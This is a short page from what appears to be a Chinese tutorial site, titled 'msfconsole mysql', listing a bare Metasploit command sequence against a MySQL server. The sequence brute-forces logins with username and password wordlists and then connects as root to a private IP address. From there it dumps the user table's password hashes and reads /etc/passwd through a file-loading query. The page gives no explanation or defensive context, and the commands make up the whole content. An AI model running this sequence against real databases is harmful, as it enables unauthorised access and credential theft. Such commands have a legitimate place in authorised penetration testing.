当前位置:Gxlcms > 数据库问题 > msfconsole mysql

msfconsole mysql

时间:2021-07-01 10:21:17 帮助过:23人阅读

search mysql   use scanner/mysql/mysql_login   show options   set RHOSTS   set USER_FILE /root/username.lst   set PASS_FILE /root/passwords.lst   exploit   mysql -h 192.168.1.106 -u root -p   select user, password from user;   select load file(‘/etc/passwd‘);

msfconsole mysql

标签:bsp   passwords   ons   mysql   sel   /etc   select   mysq   /etc/   

人气教程排行